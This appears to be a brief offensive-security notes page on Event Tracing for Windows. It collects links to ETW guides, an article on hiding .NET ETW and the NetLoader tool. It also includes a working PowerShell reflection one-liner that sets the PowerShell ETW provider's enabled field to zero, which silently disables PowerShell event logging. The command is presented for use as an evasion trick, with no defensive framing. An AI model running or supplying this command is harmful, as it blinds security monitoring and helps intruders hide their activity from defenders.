Event Tracing for Windows
https://bmcder.com/blog/a-begginers-all-inclusive-guide-to-etw
https://threadreaderapp.com/thread/1706772248802291929.html
https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/
https://github.com/Flangvik/NetLoader/blob/master/Source/Program.cs#L241-L258
Last updated 10 months ago